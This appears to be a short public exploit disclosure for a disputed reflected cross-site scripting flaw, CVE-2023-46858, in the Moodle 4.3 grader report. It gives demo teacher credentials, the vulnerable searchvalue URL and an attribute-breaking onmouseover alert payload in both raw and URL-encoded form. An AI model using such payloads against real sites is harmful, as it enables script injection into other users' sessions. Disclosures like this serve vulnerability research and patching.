Headline
CVE-2023-46858: Moodle 4.3 Reflected XSS.txt
** DISPUTED ** Moodle 4.3 allows /grade/report/grader/index.php?searchvalue= reflected XSS when logged in as a teacher. NOTE: the Moodle Security FAQ link states “Some forms of rich content [are] used by teachers to enhance their courses … admins and teachers can post XSS-capable content, but students can not.”
# Exploit Title: Moodle 4.3 Reflected XSS
# Date: 20/10/2023
# Exploit Author: Root Intrud3r
# Vendor Homepage: https://moodle.org/
# Software Demo: https://school.moodledemo.net/
# Version: 4.3
# Tested on: Linux
Vulnerability Details:
Steps :
1. Log in to the application with the given credentials > USER: teacher PASS: moodle
2. Go to this page https://school.moodledemo.net/grade/report/grader/index.php?id=69&searchvalue=
3. Write this payload in the searchvalue field : "onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"qq9r3
4. When click this url “https://school.moodledemo.net/grade/report/grader/index.php?id=69&searchvalue=%22onmouseover=%22alert(document.domain)%22style=%22position:absolute;width:100%;height:100%;top:0;left:0;%22qq9r3”
5. You will be see alert button